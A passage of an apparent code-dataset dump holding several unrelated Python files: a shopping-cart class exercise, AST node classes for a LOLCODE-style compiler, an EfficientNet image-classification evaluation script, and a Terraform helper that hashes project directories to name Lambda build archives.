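# before plotting: a rank-2 truncated SVD of the stacked point clouds,
# with u*s as plotting coordinates (assumes scipy is available).
import numpy as np
import scipy.sparse.linalg

x = np.random.rand(20, 5)
y = np.random.rand(30, 5)
u, s, _ = scipy.sparse.linalg.svds(np.concatenate([x, y], axis=0), k=2)
proj = u * s
x2d, y2d = proj[:20], proj[20:]
print(x2d.shape, y2d.shape)   # (20, 2) (30, 2)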
self.items[item_name] and quantity > 0:\n self.items[item_name] -= quantity\n self.total -= price*quantity\n\n\n elif quantity >= self.items[item_name]:\n self.total -= price*self.items[item_name]\n del self.items[item_name]\n\n \n def checkout(self,cash_paid):\n \"\"\" return the customer's balance\"\"\"\n #if cash paid is less than total\n if cash_paid < self.total:\n return \"Cash paid not enough\"\n else:\n return cash_paid - self.total\n \nclass Shop(ShoppingCart):\n \n def __init__(self):\n ShoppingCart.__init__(self) \n self.quantity = 100 \n \n def remove_item(self):\n self.quantity = self.quantity - 1\n \nif __name__ == \"__main__\":\n cart = ShoppingCart()\n cart.add_item(\"MacBook\",100,450)\n cart.add_item(\"MacAir\",600,650)\n cart.add_item(\"HP\",140,200)\n cart.add_item(\"Acer\",80,320)\n \n #show all items\n print(\"All items: \",cart.items)\n #show total\n print(\"current Total:\",cart.total)\n \n #remove macbook\n cart.remove_item(\"MacBook\",120,450)\n \n print()\n #show all items\n print(\"after removing Macbook,120,450:\",cart.items)\n print(\"Total after removing:\",cart.total)\n \n print()\n print(\"after payment of 200\")\n print(cart.checkout(200))\n \n print()\n #instance of shop\n shop = Shop()\n shop.remove_item()\n print(\"Quantity in shop:\",shop.quantity)\n","sub_path":"ShoppingCart.py","file_name":"ShoppingCart.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"246591914","text":"import abc\nfrom enum import Enum\n\nPrimitiveType = Enum('PrimitiveType', 'NUMBR NUMBAR LETTR TROOF NUMBRS NUMBARS LETTRS TROOFS YARN')\nclass CompilerTypeError(Exception): pass\nclass IndexTypeError(Exception): pass\n\n\nclass ASTNode(abc.ABC):\n def __init__(self, children=None):\n self.children = children if children else []\n \n def __repr__(self):\n result = type(self).__name__ # class name\n if self.children:\n children_reprs = [repr(child) for child in self.children]\n children_lines = '\\n'.join(children_reprs)\n children_lines_tabbed = map(lambda x: '\\t' + x, children_lines.splitlines())\n result += '\\n' + '\\n'.join(children_lines_tabbed)\n return result\n\n @abc.abstractmethod\n def compile(self, symbol_table, compiled_code):\n for child in self.children:\n child.compile(symbol_table, compiled_code)\n\n\nclass CodeBlock(ASTNode):\n \"\"\"\n Represents a block of statements. \n For instance, the main program or part of a \n flow control statement. 
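# Hedged sketch of the scoped-compilation pattern CodeBlock above uses:
# push a scope before compiling the block's children, pop it after, so
# names declared inside do not leak out. SymbolTable here is a
# hypothetical stand-in for the table the compiler threads through.
class SymbolTable:
    def __init__(self):
        self.scopes = [{}]

    def increment_scope(self):
        self.scopes.append({})

    def decrement_scope(self):
        self.scopes.pop()

table = SymbolTable()
table.increment_scope()            # entering a CodeBlock
table.scopes[-1]['x'] = 'NUMBR'    # declaration local to the block
table.decrement_scope()            # leaving it: 'x' is gone
print(table.scopes)                # [{}]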
Its children are a list\n of statements.\n \"\"\"\n def __init__(self, children):\n super().__init__(children=children)\n\n def compile(self, symbol_table, compiled_code):\n symbol_table.increment_scope()\n super().compile(symbol_table, compiled_code)\n symbol_table.decrement_scope()\n\nclass MainProgram(CodeBlock):\n \"\"\"\n Represents the entire program, has a CodeBlock as\n its only child, and a version\n \"\"\"\n def __init__(self, children, version):\n super().__init__(children=children)\n assert version.value == '1.450', version\n\n def compile(self, symbol_table, compiled_code):\n self.children[0].compile(symbol_table, compiled_code)\n\nclass PrimitiveLiteral(ASTNode):\n \"\"\"\n An abstract base class that represents primitive literals\n The string of the value is stored as its only child.\n \"\"\"\n def __init__(self, data, expr_type):\n super().__init__(children=[data])\n self.expr_type = expr_type\n\n def compile(self, symbol_table, compiled_code):\n entry = symbol_table.get_entry(expr_type=self.expr_type)\n compiled_code.append(['VAL_COPY', self.children[0], entry])\n return entry\n\nclass NumbrLiteral(PrimitiveLiteral):\n \"\"\"\n An expression that represents a Numbr (like 5).\n The string of the value is stored as its only child.\n \"\"\"\n def __init__(self, data):\n PrimitiveLiteral.__init__(self, data=data, expr_type=PrimitiveType.NUMBR)\n\nclass TroofLiteral(PrimitiveLiteral):\n \"\"\"\n An expression that represents a Troof (like WIN).\n The string of the value is stored as its only child.\n Note the enclosing quotes are included in the string.\n \"\"\"\n def __init__(self, data):\n PrimitiveLiteral.__init__(self, data=data, expr_type=PrimitiveType.TROOF)\n\n def compile(self, symbol_table, compiled_code):\n entry = symbol_table.get_entry(expr_type=self.expr_type)\n value = 1 if self.children[0] == 'WIN' else 0\n compiled_code.append(['VAL_COPY', value, entry])\n return entry\n\nclass LettrLiteral(PrimitiveLiteral):\n \"\"\"\n An expression that represents a Lettr (like 'a').\n The string of the value is stored as its only child.\n Note the enclosing quotes are included in the string.\n \"\"\"\n def __init__(self, data):\n PrimitiveLiteral.__init__(self, data=data, expr_type=PrimitiveType.LETTR)\n \n def compile(self, symbol_table, compiled_code):\n entry = symbol_table.get_entry(expr_type=self.expr_type)\n lettr = self.children[0] # like ':)'\n mapping_to_lmao_char = {\n \"':)'\": r\"'\\n'\",\n \"':>'\": r\"'\\t'\",\n \"':''\": r\"'\\''\",\n \"'::'\": r\"':'\", \n r\"'\\'\": r\"'\\\\'\", \n } \n lmao_char = mapping_to_lmao_char.get(lettr, lettr)\n compiled_code.append(['VAL_COPY', lmao_char, entry])\n return entry\n\nclass YarnLiteral(ASTNode):\n \"\"\"\n An expression that represents a YarnLiteral.\n An array of LETTR_LITERALs\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n escape = {\n ':)': r'\\n',\n ':>': r'\\t',\n ':\\'': r'\\'',\n ':\"' : r'\"',\n '::': r':', \n r\"'\\'\": r\"'\\\\\\'\",\n } \n char_lst = []\n word = self.children[0][1:-1]\n size = len(word)\n i = 0\n while i < size:\n if word[i] == ':':\n if f\"{word[i]}{word[i+1]}\" in escape:\n escp_char = word[i] + word[i+1]\n char_lst.append(escape[escp_char])\n i += 2\n else:\n char_lst.append(word[i])\n i += 1\n else:\n if word[i] == \"'\":\n char_lst.append('\\\\\\'')\n i += 1\n else:\n char_lst.append(word[i])\n i += 1\n ar_size = len(char_lst) \n ar_name = symbol_table.get_entry(PrimitiveType.LETTRS, \"a\")\n compiled_code.append(['AR_SET_SIZE', ar_name, ar_size])\n \n for i in 
range(ar_size):\n compiled_code.append(['AR_SET_IDX', ar_name, i, \"'{}'\".format(char_lst[i])])\n return ar_name\n \nclass VisibleStatement(ASTNode):\n \"\"\"\n A statement generated from \"VISIBLE , , \".\n The expr node is stored as its only child.\n \"\"\"\n def __init__(self, children, output_newline=True):\n super().__init__(children=children)\n self.output_newline = output_newline\n\n def compile(self, symbol_table, compiled_code):\n def print_entry(entry, compiled_code):\n if entry.expr_type in {PrimitiveType.NUMBAR, PrimitiveType.NUMBR, PrimitiveType.TROOF}:\n compiled_code.append(['OUT_NUM', entry])\n elif entry.expr_type == PrimitiveType.LETTR:\n compiled_code.append(['OUT_CHAR', entry])\n elif entry.expr_type == 'LETTRS' or entry.expr_type == PrimitiveType.LETTRS or entry.expr_type == PrimitiveType.YARN:\n start_label = symbol_table.get_unique_label(root='visible_array_loop_start')\n end_label = symbol_table.get_unique_label(root='visible_array_loop_end')\n result = symbol_table.get_entry('NUMBR')\n check = symbol_table.get_entry('NUMBR')\n jresult = symbol_table.get_entry('NUMBR')\n out = symbol_table.get_entry('NUMBR')\n compiled_code.append(['AR_GET_SIZE', entry, result])\n compiled_code.append(['VAL_COPY', 0, check])\n compiled_code.append([f'{start_label}:'])\n compiled_code.append(['TEST_GTE', check, result, jresult])\n compiled_code.append(['JUMP_IF_N0', jresult, end_label])\n compiled_code.append(['AR_GET_IDX', entry, check, out])\n compiled_code.append(['OUT_CHAR', out])\n compiled_code.append(['ADD', 1, check, check])\n compiled_code.append(['JUMP', start_label])\n compiled_code.append([f'{end_label}:'])\n else:\n start_label = symbol_table.get_unique_label(root='visible_array_loop_start')\n end_label = symbol_table.get_unique_label(root='visible_array_loop_end')\n result = symbol_table.get_entry('NUMBR')\n check = symbol_table.get_entry('NUMBR')\n jresult = symbol_table.get_entry('NUMBR')\n out = symbol_table.get_entry('NUMBR')\n compiled_code.append(['AR_GET_SIZE', entry, result])\n compiled_code.append(['VAL_COPY', 0, check])\n compiled_code.append([f'{start_label}:'])\n compiled_code.append(['TEST_GTE', check, result, jresult])\n compiled_code.append(['JUMP_IF_N0', jresult, end_label])\n compiled_code.append(['AR_GET_IDX', entry, check, out])\n compiled_code.append(['OUT_NUM', out])\n compiled_code.append(['ADD', 1, check, check])\n compiled_code.append(['JUMP', start_label])\n compiled_code.append([f'{end_label}:'])\n\n for child in self.children:\n child_entry = child.compile(symbol_table, compiled_code)\n print_entry(child_entry, compiled_code)\n\n if self.output_newline:\n compiled_code.append(['OUT_CHAR', r\"'\\n'\"])\n \nclass ArrayDeclaration(ASTNode):\n \"\"\"\n Declaration of array objects\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n name, declaration_type, expression = self.children\n array_entry = symbol_table.declare_array(name, declaration_type)\n num_entry = expression.compile(symbol_table, compiled_code)\n compiled_code.append([\"AR_SET_SIZE\", array_entry, num_entry])\n return array_entry\n \nclass ArrayIndex(ASTNode):\n \"\"\"\n Index array objects\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n array, index = self.children\n array_entry = array.compile(symbol_table, compiled_code)\n index_entry = index.compile(symbol_table, compiled_code)\n if index_entry.expr_type != PrimitiveType.NUMBR or array_entry.address_type != 'a':\n raise IndexTypeError(f\"Can't index on type {index_entry.expr_type}\")\n type_check = 
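# Hedged sketch of the loop VisibleStatement above emits for array
# operands: the generated LMAO code reads the size, then walks the
# indices printing one element per pass. The same control flow in
# plain Python, with the corresponding instructions noted:
def visible_array(ar, out_char):
    size = len(ar)            # AR_GET_SIZE
    i = 0                     # VAL_COPY 0
    while not (i >= size):    # TEST_GTE + JUMP_IF_N0 to the end label
        out_char(ar[i])       # AR_GET_IDX + OUT_CHAR
        i += 1                # ADD 1
    # falls through at the end label

visible_array(list('lol'), lambda ch: print(ch, end=''))
print()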
array_entry.expr_type.name\n if type_check == 'NUMBRS':\n primtype = PrimitiveType.NUMBR\n elif type_check == 'LETTRS' or type_check == 'YARN':\n primtype = PrimitiveType.LETTR\n else:\n primtype = PrimitiveType.TROOF\n result = symbol_table.get_entry(primtype)\n compiled_code.append(['AR_GET_IDX', array_entry, index_entry, result])\n return result\n\nclass LengthzExpression(ASTNode):\n \"\"\"\n Expression for returning array length\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n var = self.children[0]\n var_entry = var.compile(symbol_table, compiled_code)\n if var_entry.address_type == 's':\n raise CompilerTypeError(\"Can't find length of a non-array type\")\n result = symbol_table.get_entry(PrimitiveType.NUMBR)\n compiled_code.append(['AR_GET_SIZE', var_entry, result])\n return result\n \nclass VariableDeclaration(ASTNode):\n \"\"\"\n An expression that represents a varible identifier (like x).\n The string of the variable's name and its type are its children.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n name, declaration_type = self.children\n return symbol_table.declare_variable(name, declaration_type)\n\nclass VariableUse(ASTNode):\n \"\"\"\n An expression that represents a varible identifier (like x).\n The string of the variable's name is stored as its only child.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n name = self.children[0]\n return symbol_table.get_entry_for_variable(name)\n\nclass MathBinaryExpression(ASTNode):\n \"\"\"\n An expression that represents a math binary operation \n (like 'SUM OF josh AN 6'). The children consist of\n the operator as a string (like 'SUM'), the first operand,\n and the second operand.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n operator, expr_1, expr_2 = self.children\n entry_1 = expr_1.compile(symbol_table, compiled_code)\n entry_2 = expr_2.compile(symbol_table, compiled_code)\n\n numeric_types = {PrimitiveType.NUMBR, PrimitiveType.NUMBAR}\n if entry_1.expr_type not in numeric_types:\n raise CompilerTypeError(f'{expr_1} is not a numeric type.')\n if entry_2.expr_type not in numeric_types:\n raise CompilerTypeError(f'{expr_1} is not a numeric type.')\n if entry_1.expr_type != entry_2.expr_type:\n raise CompilerTypeError(f'{expr_1} and {expr_2} do not match types.')\n\n result_entry = symbol_table.get_entry(expr_type=entry_1.expr_type)\n \n math_lol_to_lmao = {\n 'SUM': 'ADD',\n 'DIFF': 'SUB',\n 'PRODUKT': 'MULT',\n 'QUOSHUNT': 'DIV',\n }\n lmao_command = math_lol_to_lmao[operator]\n compiled_code.append([lmao_command, entry_1, entry_2, result_entry])\n\n\n return result_entry\n\nclass MathUnaryExpression(ASTNode):\n \"\"\"\n An expression that represents a math unary operation \n (like 'FLIP OF 6'). 
The children consist of\n the operator as a string (like 'FLIP') and the operand.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n operator, expr = self.children\n entry = expr.compile(symbol_table, compiled_code)\n\n numeric_types = {PrimitiveType.NUMBR, PrimitiveType.NUMBAR}\n if entry.expr_type not in numeric_types:\n raise CompilerTypeError(f'{entry} is not a numeric type.')\n\n result_entry = symbol_table.get_entry(expr_type=entry.expr_type)\n \n if operator == 'FLIP':\n compiled_code.append(['DIV', 1, entry, result_entry])\n else: # operator == 'SQUAR':\n compiled_code.append(['MULT', entry, entry, result_entry])\n return result_entry\n\n\nclass AssignmentExpression(ASTNode):\n \"\"\"\n An expression that represents an assignment (like 'toyz R \"us\"')\n or intializations (like 'I HAS A x ITZ A NUMBR AN ITZ 5').\n Its expr_type is the type of the right side of the assignment\n (YARN and NUMBR in the above examples).\n The left side (the variable expression) and the right side (the value)\n being assigned compose its two children\n \"\"\"\n def __init__(self, left_side, right_side):\n super().__init__(children=[left_side, right_side])\n \n \n def compile(self, symbol_table, compiled_code):\n yarn_lettrs = {PrimitiveType.YARN, PrimitiveType.LETTRS}\n left_side, right_side = self.children\n right_entry = right_side.compile(symbol_table, compiled_code)\n left_entry = left_side.compile(symbol_table, compiled_code)\n if left_entry.expr_type != right_entry.expr_type:\n if not (left_entry.expr_type in yarn_lettrs and right_entry.expr_type in yarn_lettrs):\n raise CompilerTypeError(f'{left_entry.expr_type} != {right_entry.expr_type}')\n if right_entry.address_type == 'a':\n compiled_code.append(['AR_COPY', right_entry, left_entry])\n else:\n if isinstance(left_side, ArrayIndex):\n var_name = left_side.children[0].children[0]\n lit_address = left_side.children[1]\n var_address = symbol_table.get_entry_for_variable(var_name)\n last_address = compiled_code[-1][2]\n compiled_code.append(['AR_SET_IDX', var_address, last_address, right_entry])\n compiled_code.append(['VAL_COPY', right_entry, left_entry])\n return left_entry\n\nclass LogicalExpressionLazy(ASTNode):\n \"\"\"\n An expression that represents a logical expression \n (like 'BOTH OF WIN AN FAIL').\n The first child is the operator, and the rest of the children\n are the TROOF expressions to be evaluated.\n Only evaluates as many operands as needed to determine result.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n def check_is_troof_and_get_entry(expr):\n entry = expr.compile(symbol_table, compiled_code)\n if entry.expr_type != PrimitiveType.TROOF:\n raise CompilerTypeError(\n f'Using non-TROOF type {entry.expr_type} in logical expression')\n return entry\n\n operator = self.children[0]\n \n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.TROOF)\n child_exprs = self.children[1:]\n\n compiled_code.append([f'# Logical Expression (result in {result_entry})'])\n \n if operator == 'NOT':\n entry = check_is_troof_and_get_entry(child_exprs[0])\n compiled_code.append(['TEST_EQU', entry, 0, result_entry])\n elif operator in {'BOTH', 'ALL', 'EITHER', 'ANY'}:\n lazy_jump_label = symbol_table.get_unique_label(root='logical_lazy_jump')\n for expr in child_exprs:\n entry = check_is_troof_and_get_entry(expr)\n command = 'JUMP_IF_0' if operator in {'BOTH', 'ALL'} else 'JUMP_IF_N0'\n compiled_code.append([command, entry, lazy_jump_label])\n compiled_code.append(['VAL_COPY', entry, result_entry])\n\n end_label = 
symbol_table.get_unique_label(root='logical_end')\n compiled_code.append(['JUMP', end_label])\n compiled_code.append([lazy_jump_label + ':'])\n value = 0 if operator in {'BOTH', 'ALL'} else 1\n compiled_code.append(['VAL_COPY', value, result_entry])\n compiled_code.append([end_label + ':'])\n elif operator in {}:\n pass\n else: # operator == 'WON'\n entry_1 = check_is_troof_and_get_entry(child_exprs[0])\n entry_2 = check_is_troof_and_get_entry(child_exprs[1])\n compiled_code.append(['TEST_NEQU', entry_1, entry_2, result_entry])\n\n compiled_code.append([f'# Logical Expression (result in {result_entry}) Done'])\n return result_entry\n\nclass LogicalExpression(ASTNode):\n \"\"\"\n An expression that represents a logical expression \n (like 'BOTH OF WIN AN FAIL').\n The first child is the operator, and the rest of the children\n are the TROOF expressions to be evaluated.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n operator = self.children[0]\n entries = [expr.compile(symbol_table, compiled_code) \n for expr in self.children[1:]]\n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.TROOF)\n if operator == 'NOT':\n compiled_code.append(['TEST_EQU', entries[0], 0, result_entry])\n elif operator in {'BOTH', 'EITHER', 'WON'}:\n compiled_code.append(['ADD', entries[0], entries[1], result_entry])\n if operator == 'BOTH': \n compiled_code.append(['TEST_EQU', result_entry, 2, result_entry])\n elif operator == 'EITHER': \n compiled_code.append(['TEST_GTE', result_entry, 1, result_entry])\n else: # operator == 'WON': \n compiled_code.append(['TEST_EQU', result_entry, 1, result_entry])\n else: # operator in {'ALL', 'ANY'}:\n compiled_code.append(['VAL_COPY', 0, result_entry])\n for entry in entries:\n compiled_code.append(['ADD', entry, result_entry, result_entry])\n if operator == 'ALL':\n compiled_code.append(['TEST_EQU', len(entries), result_entry, result_entry])\n else: # operator == 'ANY'\n compiled_code.append(['TEST_GTE', result_entry, 1, result_entry])\n return result_entry\n\n\n\nclass ComparisonExpression(ASTNode):\n \"\"\"\n An expression that represents a comparison expression \n (like 'BOTH SAEM 5 AN 7').\n The first child is the operator, and the rest of the children\n are the two operands.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n operator, expr_1, expr_2 = self.children\n entry_1 = expr_1.compile(symbol_table, compiled_code)\n entry_2 = expr_2.compile(symbol_table, compiled_code)\n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.TROOF)\n \n if entry_1.expr_type != entry_2.expr_type:\n compiled_code.append(['VAL_COPY', 0, result_entry])\n return result_entry\n\n lol_to_lmao = {\n 'SAEM': 'TEST_EQU',\n 'DIFFRINT': 'TEST_NEQU',\n 'FURSTSMALLR': 'TEST_LESS',\n 'FURSTBIGGR': 'TEST_GTR',\n }\n lmao_command = lol_to_lmao[operator]\n compiled_code.append([lmao_command, entry_1, entry_2, result_entry])\n return result_entry\n\n\nclass WhatevrExpression(ASTNode):\n \"\"\"\n A node representing a random NUMBR.\n \"\"\"\n def __init__(self):\n super().__init__()\n \n def compile(self, symbol_table, compiled_code):\n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.NUMBR)\n compiled_code.append(['RANDOM', result_entry])\n return result_entry\n\nclass GimmehExpression(ASTNode):\n \"\"\"\n A node representing a request of a LETTR from standard input.\n \"\"\"\n def __init__(self):\n super().__init__()\n \n def compile(self, symbol_table, compiled_code):\n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.LETTR)\n 
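# Hedged sketch of the short-circuiting LogicalExpressionLazy above
# compiles: for BOTH/ALL, jump out on the first falsy operand; for
# EITHER/ANY, on the first truthy one. Operands are thunks here so the
# skipped evaluation is observable.
def all_lazy(*thunks):
    for t in thunks:
        if t() == 0:      # JUMP_IF_0 to the lazy label
            return 0      # VAL_COPY 0 at the lazy label
    return 1

print(all_lazy(lambda: 1, lambda: 0, lambda: 1 // 0))   # 0; third thunk never runs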
compiled_code.append(['IN_CHAR', result_entry])\n return result_entry\n\nclass ORLYStatement(ASTNode):\n \"\"\"\n A node representing a O RLY? statement.\n Its children are (in the following order):\n a conditional expression,\n a code block (YA RLY),\n a list (possible empty) of mebbe expresions/block pairs,\n a code block (possibly None) of NO WAI\n\n \"\"\"\n def __init__(self, children):\n super().__init__(children=children)\n \n def compile(self, symbol_table, compiled_code):\n def compile_and_check_troof(expr):\n entry = expr.compile(symbol_table, compiled_code)\n if entry.expr_type != PrimitiveType.TROOF:\n raise CompilerTypeError(\n f'{cond_entry.expr_type} is not an acceptable conditional expression')\n return entry\n\n compiled_code.append(['# Compiling O RLY Statement'])\n expr, if_true_block, otherwise_block = self.children\n \n oic_label = symbol_table.get_unique_label(root='oic')\n \n expr = compile_and_check_troof(expr)\n after_label = symbol_table.get_unique_label(root='after_if_true_block')\n compiled_code.append(['JUMP_IF_0', expr, after_label])\n if_true_block.compile(symbol_table, compiled_code)\n compiled_code.append(['JUMP', oic_label])\n compiled_code.append([after_label + ':'])\n\n\n if otherwise_block:\n otherwise_block.compile(symbol_table, compiled_code)\n\n compiled_code.append([oic_label + ':'])\n compiled_code.append(['# Done with O RLY Statement'])\n\nclass LoopStatement(ASTNode):\n \"\"\"\n A node representing a loop statement.\n Its children are (in the following order):\n a code block representing the body of the loop\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n compiled_code.append(['# Compiling Loop Statement'])\n body, expr = self.children\n\n start_label = symbol_table.get_unique_label(root='loop_start')\n end_label = symbol_table.get_unique_label(root='loop_end')\n compiled_code.append([start_label + ':'])\n if expr:\n if len(expr) > 1:\n exit_entry = expr[1].compile(symbol_table, compiled_code)\n if exit_entry.expr_type != PrimitiveType.TROOF:\n raise CompilerTypeError(\"TIL expression not TROOF\")\n compiled_code.append(['JUMP_IF_N0', exit_entry, end_label])\n if not isinstance(expr[0], AssignmentExpression):\n exit_entry = expr[0].compile(symbol_table, compiled_code)\n if exit_entry.expr_type != PrimitiveType.TROOF:\n raise CompilerTypeError(\"TIL expression not TROOF\")\n compiled_code.append(['JUMP_IF_N0', exit_entry, end_label])\n symbol_table.push_GTFO_stack(end_label)\n\n body.compile(symbol_table, compiled_code)\n if expr:\n if isinstance(expr[0], AssignmentExpression):\n expr[0].compile(symbol_table, compiled_code)\n\n compiled_code.append(['JUMP', start_label])\n compiled_code.append([end_label + ':'])\n symbol_table.pop_GTFO_stack()\n compiled_code.append(['# Done with Loop Statement'])\n\nclass GTFOStatement(ASTNode):\n \"\"\"\n A node representing a GTFO (break) statement.\n It has no children. 
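# Hedged sketch of the break-label stack behind GTFOStatement above:
# each loop pushes its end label on entry and pops it on exit, so GTFO
# always jumps to the innermost enclosing loop's end.
gtfo_stack = []

def push_loop(end_label):          # LoopStatement's push_GTFO_stack
    gtfo_stack.append(end_label)

def compile_gtfo():                # GTFOStatement's read_GTFO_stack
    return ['JUMP', gtfo_stack[-1]]

push_loop('loop_end_1')
push_loop('loop_end_2')
print(compile_gtfo())              # ['JUMP', 'loop_end_2'] (inner loop)
gtfo_stack.pop()                   # leaving the inner loop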
It relies on the Symbol Table to determine\n jump destination.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n destination = symbol_table.read_GTFO_stack()\n compiled_code.append(['JUMP', destination])","sub_path":"Project5/ast_nodes.py","file_name":"ast_nodes.py","file_ext":"py","file_size_in_byte":24167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"339038801","text":"# %%\nimport numpy as np\nfrom PIL import Image\nimport tensorflow as tf\nfrom keras.models import *\nimport keras\nimport pandas as pd\nfrom keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\nfrom keras.applications.imagenet_utils import preprocess_input\nimport efficientnet.keras as efn\nfrom keras.metrics import categorical_accuracy\nimport math\n\n# %%\nwith open(f'tmp/model_EfficientNet-B5-9.4.6-0.json', 'r') as f:\n model = model_from_json(f.read())\n model.load_weights(\n f'tmp/ckpt-EfficientNet-B5-9.4.6-0-Epoch_030-acc_0.99586-val_acc_0.94724.h5')\n\n# %%\n(b, w, h, c) = model.input_shape\nbatch_size = 16\n# %%\nlabels_valid = pd.read_csv('tmp/labels_valid.csv')\nlabels_valid['lb'] = labels_valid.label.apply(lambda x: f'{x:02d}')\n# %%\n# 0.8945601074546675\n\n\ndef aug_images(img_raw, img_size=(299, 299)):\n (w, h) = img_raw.size\n if h <= w:\n b = (w-h)//2\n box_center = (b, 0, h+b, h)\n box_top = (0, 0, h, h)\n box_bottom = (w-h, 0, w, h)\n else:\n b = (h-w)//2\n box_center = (0, b, w, w+b)\n box_top = (0, 0, w, w)\n box_bottom = (0, h-w, w, h)\n\n imgs = [\n img_raw.resize(img_size, Image.LANCZOS),\n # img_raw.crop(box_center).resize(img_size, Image.LANCZOS),\n # img_raw.crop(box_top).resize(img_size, Image.LANCZOS),\n # img_raw.crop(box_bottom).resize(img_size, Image.LANCZOS),\n ]\n # imgs_flip = [i.transpose(Image.FLIP_LEFT_RIGHT) for i in imgs]\n # imgs = imgs+imgs_flip\n imgs_new = []\n for img in imgs:\n imgs_new.append(img)\n imgs_new.append(img.transpose(Image.ROTATE_90))\n imgs_new.append(img.transpose(Image.ROTATE_180))\n imgs_new.append(img.transpose(Image.ROTATE_270))\n\n return np.array([efn.preprocess_input(np.array(x)) for x in imgs_new])\n\n\nlbs = []\nfor r in labels_valid.itertuples():\n img = Image.open('garbage_classify/train_data/' + r.fname)\n imgs = aug_images(img, (w, h))\n pred = model.predict(imgs)\n lbs.append(np.argmax(np.sum(pred, axis=0)))\n\n\nreal_labels = labels_valid.label.values\npred_labels = np.array(lbs)\npd.DataFrame(pred_labels).to_csv('tmp/preds.csv', index=False)\nacc = (real_labels == pred_labels).sum()/real_labels.shape[0]\nacc\n\n# %%\nreal_labels = pd.read_csv('tmp/labels_valid.csv').label.values\npred_labels = pd.read_csv('tmp/preds.csv').values.flatten()\n\n\n# %%\n","sub_path":"src_yml/result_analyse_v4.4.py","file_name":"result_analyse_v4.4.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120934130","text":"#!/usr/bin/env python3\n#\n# Build Lambda function with no binary dependencies\n#\nimport os\nimport glob\nimport json\nimport sys\nimport datetime\nimport contextlib\nimport hashlib\nimport base64\nfrom functools import wraps\nfrom past.builtins import basestring\n\n# -- helpers --\n\n# vendored in from: https://github.com/operatingops/terraform_external_data\n\ndef error(message):\n \"\"\"\n Errors must create non-zero status codes and human-readable, ideally one-line, messages on stderr.\n \"\"\"\n print(message, file=sys.stderr)\n sys.exit(1)\n\n\ndef 
validate(data):\n \"\"\"\n Query data and result data must have keys whose values are strings.\n \"\"\"\n if not isinstance(data, dict):\n error('Data must be a dictionary.')\n for value in data.values():\n if not isinstance(value, basestring):\n error('Values must be strings.')\n\n\ndef terraform_external_data(function):\n \"\"\"\n Query data is received on stdin as a JSON object.\n Result data must be returned on stdout as a JSON object.\n The wrapped function must expect its first positional argument to be a dictionary of the query data.\n \"\"\"\n @wraps(function)\n def wrapper(*args, **kwargs):\n query = json.loads(sys.stdin.read())\n validate(query)\n try:\n result = function(query, *args, **kwargs)\n except Exception as e:\n # Terraform wants one-line errors so we catch all exceptions and trim down to just the message (no trace).\n error('{}: {}'.format(type(e).__name__, e))\n validate(result)\n sys.stdout.write(json.dumps(result))\n return wrapper\n\n# -- assorted helpers --\n\n@contextlib.contextmanager\ndef cd(path):\n old_dir = os.getcwd()\n os.chdir(path)\n try:\n yield\n finally:\n os.chdir(old_dir)\n\ndef hash_file(file_path, digest=None):\n if digest is None:\n digest = hashlib.sha1()\n\n if os.path.isfile(file_path):\n with open(file_path, 'rb') as f_obj:\n while True:\n buf = f_obj.read(1024 * 1024)\n if not buf:\n break\n digest.update(buf)\n else:\n raise FileNotFoundError\n\n return digest.hexdigest()\n\ndef hash_directory(path):\n digest = hashlib.sha1()\n\n if not os.path.exists(path):\n raise FileNotFoundError\n\n for root, dirs, files in sorted(os.walk(path)):\n for names in files:\n\n # ignore .git, .gitkeep and requirements.txt\n if root.find(\"/.git\") != -1:\n continue\n if names in [\".gitkeep\", \"requirements.txt\"]:\n continue\n\n file_path = os.path.join(root, names)\n digest.update(hashlib.sha1(file_path[len(path):].encode()).digest())\n hash_file(file_path, digest)\n\n return digest.hexdigest()\n\ndef find_old_identifier(output_glob_filepath):\n glob_found = glob.glob(output_glob_filepath)\n return glob_found[0] if len(glob_found) == 1 else None\n\n# -- main --\n\n@terraform_external_data\ndef main(query):\n with contextlib.suppress(FileNotFoundError):\n query['project_path_hash'] = hash_directory(query['project_path'])\n\n with contextlib.suppress(FileNotFoundError):\n query['lib_path_hash'] = hash_directory(query['lib_path'])\n\n with contextlib.suppress(FileNotFoundError):\n query['requirements_file_hash'] = hash_file(query['requirements_file'])\n\n sha1 = hashlib.sha1(json.dumps(query).encode())\n function_name = query[\"name\"]\n\n # determine if the resulting zipfile already exists with the right content:\n output_path = query[\"output_path\"]\n output_filepattern = \"{}_{{}}.zip\".format(function_name)\n output_glob_filepath = \"{}/{}\".format(output_path, output_filepattern.format(\"*\"))\n\n # Search for a file with an existing identifier\n output_zipfile_path = find_old_identifier(output_glob_filepath)\n if not output_zipfile_path:\n # If file wasn't found, return new identifier based on timestamp\n identifier_base = \"{}{}\".format(datetime.datetime.now().isoformat(), function_name)\n identifier_sha = hashlib.sha1(identifier_base.encode())\n identifier = base64.urlsafe_b64encode(identifier_sha.digest()).decode()[:16]\n output_zipfile_path = \"{}/{}\".format(output_path, output_filepattern.format(identifier))\n\n return {'sha': sha1.hexdigest(),\n 'output_filepath': output_zipfile_path,\n 'isodate': datetime.datetime.now().isoformat()}\n\n\nif 
